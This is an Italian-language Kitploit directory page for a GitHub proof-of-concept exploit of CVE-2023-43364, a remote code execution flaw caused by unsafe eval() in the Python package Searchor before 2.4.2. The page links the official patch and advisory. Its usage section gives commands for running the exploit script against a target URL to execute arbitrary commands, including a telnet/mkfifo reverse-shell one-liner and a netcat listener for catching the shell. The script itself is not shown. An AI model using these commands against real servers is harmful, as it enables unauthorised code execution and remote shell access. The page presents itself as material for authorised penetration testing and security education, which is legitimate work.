Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2023-43364-Searchor-RCE-Exploit — POC di exploit tramite uso non sicuro di `eval()` in Searchor (< 2.4.2) | Kitploit
Strumenti/GitHubGitHub/herick-costa/cve-2023-43364-searchor-rce-exploit
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingApprendimento e Formazione
GitHubherick-costa/cve-2023-43364-searchor-rce-exploit

CVE-2023-43364-Searchor-RCE-Exploit

POC di exploit tramite uso non sicuro di `eval()` in Searchor (< 2.4.2)

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
Vedi Repository
11 mese faNon ancora revisionato

CVE-2023-43364 – Exploit RCE di Searchor (PoC)

Esecuzione remota di codice (RCE) tramite uso non sicuro di eval() in Searchor (< 2.4.2)

Panoramica

Questo progetto dimostra lo sfruttamento di CVE-2023-43364, una vulnerabilità di esecuzione remota di codice (RCE) che colpisce il pacchetto Python Searchor (< 2.4.2).

Il problema è causato dall'uso non sicuro di eval() su input controllati dall'utente, consentendo agli aggressori di iniettare ed eseguire codice Python arbitrario.

La vulnerabilità è stata corretta rimuovendo l'uso insicuro di eval(), come mostrato nella patch ufficiale:

  • https://github.com/ArjunSharda/Searchor/commit/16016506f7bf92b0f21f51841d599126d6fcd15b

Ulteriori dettagli tecnici e avviso:

  • https://github.com/advisories/GHSA-66m2-493m-crh2

Questa prova di concetto fornisce molteplici metodi di esecuzione, tra cui esecuzione di comandi, validazione del test e reverse shell.

Utilizzo

Test RCE

Esegui un semplice comando (id) per verificare l'esecuzione del codice:

root@kitploit:~
python3 CVE-2023-43364.py <URL> --test

Esegui comando personalizzato Esegui qualsiasi comando sul server di destinazione:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "whoami"

Esempi:

root@kitploit:~
python3 CVE-2023-43364.py <URL> -a "TF=$(mktemp -u);mkfifo $TF && telnet IP PORT 0<$TF | sh 1>$TF"
python3 CVE-2023-43364.py <URL> -a "ls -la"

Shell inversa Avvia un listener sulla tua macchina:

root@kitploit:~
nc -lvnp 4444

Esegui l'exploit:

root@kitploit:~
python3 CVE-2023-43364.py <URL> <LHOST>

⚠️ Dichiarazione di non responsabilità

Questo progetto è destinato a:

  • a scopo educativo
  • ricerca sulla sicurezza
  • solo test di penetrazione autorizzati

L'autore non è responsabile per qualsiasi uso improprio o danno causato da questo strumento.

Usa questo exploit solo in ambienti controllati o su sistemi per i quali hai esplicita autorizzazione al test.

Scarica lo strumento